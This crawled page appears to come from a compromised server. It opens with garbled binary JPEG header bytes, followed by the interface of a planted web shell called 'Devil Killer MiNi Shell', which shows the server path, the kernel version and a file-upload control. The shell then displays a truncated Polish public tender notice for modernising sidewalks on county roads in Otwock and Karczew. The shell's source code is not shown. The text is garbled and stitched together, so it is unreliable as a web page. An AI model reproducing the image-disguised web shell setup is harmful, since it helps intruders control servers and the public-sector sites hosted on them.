JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221024/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221024/0040733601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja chodników na drogach powiatowych w Powiecie Otwockim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W OTWOCKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 014848593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bohaterów Westerplatte 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Karczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdp@powiat-otwocki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.powiat-otwocki.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja chodników na drogach powiatowych w Powiecie Otwockim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-23e17829-5393-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00407336</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdpotwock.eb2b.com.pl/edit-auction.html/371669 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym a wykonawcami odbywa się wyłącznie przy<br/>użyciu środków komunikacji elektronicznej zgodnie z art. 61 ustawy, za pośrednictwem elektronicznej platformy zakupowej (dalej:<br/>„Platforma”) pod adresem: https://zdpotwock.eb2b.com.pl/ , która spełnia wymagania opisane w art. 64 ustawy. Wykonawca<br/>zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na Platformie Zakupowej. Zarejestrowanie <br/>i utrzymywanie konta na Platformie Zakupowej oraz korzystanie z Platformy jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>korzystania z Platformy Zakupowej określa Regulamin Platformy Zakupowej (dostępny pod adresem internetowym<br/>https://platforma.eb2b.com.pl/user/terms lub https://xx.eb2b.com.pl/user/terms). Wykonawca przystępując do postępowania o<br/>udzielenie<br/>zamówienia publicznego tj. bezpłatnie rejestrując się lub logując (w przypadku posiadania konta w Platformie Zakupowej), akceptuje<br/>warunki korzystania z Platformy, określone w Regulaminie oraz uznaje go za wiążący.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest Zarząd Dróg Powiatowych w Otwocku z/s w<br/>Karczewie ul. Bohaterów Westerplatte 36, 05-480 Karczew tel. 22 780 64 21<br/>• inspektorem ochrony danych osobowych w Zarząd Dróg Powiatowych w Otwocku jest Pani Daria<br/>Bartnicka, email: iod@powiat-otwocki.pl ,<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego,<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843),<br/>dalej „ustawa Pzp”;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>• posiada Pani/Pan: na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; na podstawie art. 16<br/>RODO prawo do sprostowania Pani/Pana danych osobowych **; na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;<br/>• nie przysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania<br/>lub uzupełnienia o których mowa w art 16 rozporządzenia 2016/679 , nie może skutkować zmiana wyniku postępowania o udzielenie<br/>zamówienia ani zmianą postanowień umowy w sprawi Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do<br/>sprostowania lub uzupełnienia o których mowa w art 16<br/>rozporządzenia 2016/679 , nie może skutkować zmiana wyniku postępowania o udzielenie zamówienia ani zmianą postanowień</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP/P-24/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> części I - modernizacja nawierzchni chodnika w drodze powiatowej Nr 2774W – ul. Wiślanej w Karczewie.<br/>Przedmiot zamówienia obejmuje: <br/>1.	Wykonanie robót rozbiórkowych istniejących elementów chodnika i zjazdów tj. krawężnika, obrzeży, nawierzchni chodnika i zjazdów,<br/>2.	Wykonanie korytowania na średnią głębokość 33 cm mierzoną od góry nawierzchni chodnika oraz 38 cm mierzoną od góry nawierzchni zjazdu, koryto musi być wyprofilowane oraz zagęszczone przy czym współczynnik zagęszczenia musi wynosić Is ≥ 1,0,<br/>3.	Ustawienie nowych obrzeży ulicznych 8x30x100 cm na ławie z oporem z betonu cementowego C 12/15, obrzeże należy ustawić wykonując tzw. „światło” wynoszące 5 cm od strony nawierzchni chodnika,<br/>Regulacji wysokościowej i ustawienie nowego krawężnika betonowego 20x30x100 cm na ławie z oporem z betonu cementowego C12/15, krawężnik należy ustawić wykonując tzw. „światło” wynoszące ok. 10 cm od strony nawierzchni jezdni. Powstałą szczelinę wynoszącą nie więcej niż 3 cm pomiędzy nawierzchnią jezdni, a krawężnikiem należy dociąć do równej krawędzi i zalać masą na bazie bitumu;<br/>4.	Ustawienie nowego opornika betonowego 12x25x100 cm na ławie z oporem z betonu cementowego C12/15 na zjazdach.<br/>5.	Wykonanie podbudowy z kruszywa łamanego 0-31,5 mm – warstwa górna o grubości po zagęszczeniu 20 cm dla chodnika i 25 cm dla zjazdu, przy czym stosunek modułu wtórnego E2 do pierwotnego E1 musi być mniejszy bądź równy 2,2 a E1 musi wynosić min. 80 MPa;<br/>6.	Wykonanie nawierzchni chodnika o zmiennej szerokości z betonowej kostki brukowej prostokątnej 10 x 20 cm o grubości 8 cm, na podsypce cementowo – piaskowej 1:5 grubości min. 5 cm, nawierzchnię chodnika należy układać przy zachowaniu spadku poprzecznego wynoszącego 2 % w stronę jezdni, nawierzchnia musi zostać zamulona piaskiem. Kolor nawierzchni należy ustalić z Zamawiającym;<br/>7.	Wykonanie zjazdów indywidualnych/publicznych o zmiennej szerokości – nawierzchnia z betonowej kostki brukowej na podsypce cementowo – piaskowej o grubości min. 5 cm z kostki brukowej prostokątnej 10 x 20 cm o grubości 8 cm. Sposób wykonania nawierzchni zjazdu oraz ich kolorystykę należy uzgodnić z Inspektorem wyznaczonym przez Zamawiającego.<br/><br/>Informacje dotyczące zadania <br/>1.	Prace należy przeprowadzić na ulicy Wiślanej w Karczewie,<br/>2.	Prace należy prowadzić od posesji nr 22 w kierunku ul. Warszawskiej w Karczewie,<br/>3.	Remont chodnika należy przeprowadzić po istniejącym jego śladzie, przy czym nawierzchnię chodnika należy wykonać o szerokości 2,0 m mierzonej pomiędzy elementami ograniczającymi, a krawężnikiem i obrzeżem.<br/>4.	W ramach zamówienia należy wyregulować wysokościowo krawężnik, ustawić obrzeża, ustawić oporniki betonowe oraz wymienić nawierzchnię chodnika za łączną kwotę 58 907,28 zł brutto.<br/>5.	Wykonawca zobowiązany jest do dokonania regulacji wysokościowej istniejących krawężników betonowych gr. 20 cm na ławie betonowej wraz z wykonaniem oporu oraz wymianą uszkodzonych elementów – krawężniki przeznaczone do wymiany określa Zamawiający. <br/>6.	Wykonawca dokona rozbiórki istniejącej nawierzchni chodnika wraz z wykonaniem nowej nawierzchni z kostki betonowej prostokątnej 20x10 cm grubości 8 cm układanej na posypce cementowo – piaskowej grubości min. 5 cm oraz podbudowie z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 grubości warstwy min 20 cm.<br/>7.	Chodnik należy wykonać o szerokości 2,0 m mierzonej jako szerokość nawierzchni pomiędzy elementami ograniczającymi tj. krawężnik i obrzeże. W miejscach gdzie niemożliwe jest wykonanie chodnika o szerokości 2,0 m z uwagi na występujące przeszkody terenowe tj. ogrodzenia, budynki itp. nawierzchnię należy wykonać do przeszkody. Nawierzchnia chodnika musi zostać wykonana ze spadkiem wynoszącym 2 % w kierunku jezdni. <br/>8.	Należy wykonać wymianę nawierzchni na istniejących dojściach do posesji w granicy pasa drogowego o konstrukcji jak dla chodnika.<br/>9.	Wykonawca zobowiązany jest do wymiany nawierzchni zjazdów indywidualnych i publicznych w granicy pasa drogowego z kostki betonowej prostokątnej 20 x10 o grubości 8 cm układanej na posypce cementowo- piaskowej o grubości min. 5 cm i podbudowie z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 grubości warstwy min. 25 cm. Zjazdy należy obstawić w oporniku szer. 12 cm na odcinku wychodzącym poza chodnik.<br/>10.	W ramach inwestycji należy dokonać regulacji wysokościowej wystających elementów infrastruktury tj. skrzynki zaworów, zasuw i hydrantów występujących w modernizowanej nawierzchni chodnika i zjazdów. Regulację należy przeprowadzić w uzgodnieniu z gestorami sieci.<br/>11.	Ustawienie nowych obrzeży ulicznych 8x30x100 cm na ławie z oporem z betonu cementowego C 12/15 na długości modernizowanej nawierzchni chodnika, obrzeże należy ustawić wykonując tzw. „światło” wynoszące 5 cm od strony nawierzchni chodnika.<br/>Zamawiający informuje, że rozliczenie nastąpi w formie wynagrodzenia obmiarowego. Wynagrodzenie będzie liczone jako iloczyn podanej w formularzu ofertowym ceny brutto i faktycznie wykonanych robót, lecz łączna wartość wynagrodzenia za wykonane roboty budowlane nie może być wyższa niż 58 907,28 zł brutto. Wykonawca w ofercie zobowiązany jest do podania ceny brutto za:<br/>- ustawienie 1 mb obrzeży betonowych 8x30x100 cm na ławie z oporem z betonu cementowego C 12/15 wraz z materiałem oraz rozbiórką istniejącego obrzeża,<br/>- wykonanie 1mb regulacji wysokościowej istniejących krawężników na ławie betonowej z oporem wraz z materiałem,<br/>- ustawienie 1 mb nowego krawężnika betonowego 20x30x100 cm na ławie z oporem wraz z materiałem oraz rozbiórką istniejącego krawężnika,<br/>- wykonanie 1 m2 nawierzchni z kostki betonowej prostokątnej 20x10 cm o grubości 8 cm układane na podsypce cementowo – piaskowej o grubości min. 5 cm oraz podbudowie z kruszywa łamanego stabilizowanego mechanicznie o grubości warstwy min. 20 cm wraz z materiałem, rozbiórką istniejącej nawierzchni i wykonaniem korytowania – chodnik;<br/>- wykonanie 1 m2 nawierzchni z kostki betonowej prostokątnej 20x10 cm o grubości 8 cm układane na podsypce cementowo – piaskowej o grubości min. 5 cm oraz podbudowie z kruszywa łamanego stabilizowanego mechanicznie o grubości warstwy min. 25 cm wraz z materiałem, rozbiórką istniejącej nawierzchni i wykonaniem korytowania – zjazdy<br/>- ustawieniem 1mb opornika betonowego na ławie wraz z oporem z betonu; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto za wykonanie 1mb regulacji wysokościowej istniejących krawężników na ławie betonowej z oporem wraz z materiałem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto za ustawienie 1 mb nowego krawężnika betonowego 20x30x100 cm na ławie z oporem wraz z materiałem oraz rozbiórką istniejącego krawężnika</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto za wykonanie 1 m2 nawierzchni z kostki betonowej prostokątnej 20x10 cm o grubości 8 cm układane na podsypce cementowo – piaskowej o grubości min. 5 cm oraz podbudowie z kruszywa łamanego stabilizowanego mechanicznie o grubości warstwy min. 20 cm wraz z materiałem, rozbiórką istniejącej nawierzchni i wykonaniem korytowania – chodnik;</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto za wykonanie 1 m2 nawierzchni z kostki betonowej prostokątnej 20x10 cm o grubości 8 cm układane na podsypce cementowo – piaskowej o grubości min. 5 cm oraz podbudowie z kruszywa łamanego stabilizowanego mechanicznie o grubości warstwy min. 25 cm wraz z materiałem, rozbiórką istniejącej nawierzchni i wykonaniem korytowania – zjazdy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 6</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto za ustawieniem 1mb opornika betonowego na ławie wraz z oporem z betonu;</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 7</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> części II - Modernizacja nawierzchni chodnika w drodze powiatowej Nr 2759W – ul. Narutowicza w Otwocku<br/>Przedmiot zamówienia obejmuje: <br/>1.	Wykonanie robót rozbiórkowych istniejących elementów chodnika i zjazdów tj. krawężnika, obrzeży, nawierzchni chodnika i zjazdów,<br/>2.	Wykonanie korytowania na średnią głębokość 28 cm mierzoną od góry nawierzchni chodnika oraz 38 cm mierzoną od góry nawierzchni zjazdu, koryto musi być wyprofilowane oraz zagęszczone przy czym współczynnik zagęszczenia musi wynosić Is ≥ 1,0,<br/>3.	Ustawienie nowych obrzeży ulicznych 8x30x100 cm na ławie z oporem z betonu cementowego C 12/15,<br/>4.	Ustawienie nowego opornika betonowego 12x25x100 cm na ławie z oporem z betonu cementowego C12/15 na zjazdach jako obramowanie od strony posesji oraz obramowanie zjazdu poza chodnikiem.<br/>5.	Wykonanie podbudowy z kruszywa łamanego 0-31,5 mm – warstwa górna o grubości po zagęszczeniu 15 cm dla chodnika i 25 cm dla zjazdu, przy czym stosunek modułu wtórnego E2 do pierwotnego E1 musi być mniejszy bądź równy 2,2 a E1 musi wynosić min. 80 MPa;<br/>6.	Wykonanie nawierzchni chodnika o zmiennej szerokości z betonowej kostki brukowej prostokątnej 10 x 20 cm o grubości 6 cm koloru szarego bezfazowej, na podsypce cementowo – piaskowej 1:5 grubości min. 5 cm, nawierzchnię chodnika należy układać przy zachowaniu spadku poprzecznego wynoszącego 2 % w stronę jezdni, nawierzchnia musi zostać zamulona piaskiem.<br/>7.	Wykonanie zjazdów indywidualnych/publicznych o zmiennej szerokości – nawierzchnia z betonowej kostki brukowej układanej na podsypce cementowo – piaskowej o grubości min. 5 cm z kostki brukowej prostokątnej 10 x 20 cm o grubości 8 cm koloru grafitowego bezfazowej, nawierzchnia zjazdu musi zostać zamulona piaskiem. Sposób wykonania nawierzchni zjazdu uzgodnić z Zamawiającym.<br/>Informacje dotyczące zadania <br/>1.	Prace należy przeprowadzić na ulicy Narutowicza w Otwocku,<br/>2.	Prace należy prowadzić od posesji nr 271 w kierunku ul. Sasanki w Otwocku,<br/>3.	Remont chodnika należy przeprowadzić po istniejącym jego śladzie, <br/>4.	W ramach zamówienia należy ustawić obrzeża, wykonać nawierzchnię z kostki betonowej na chodniku oraz zjazdach wraz z podbudową, 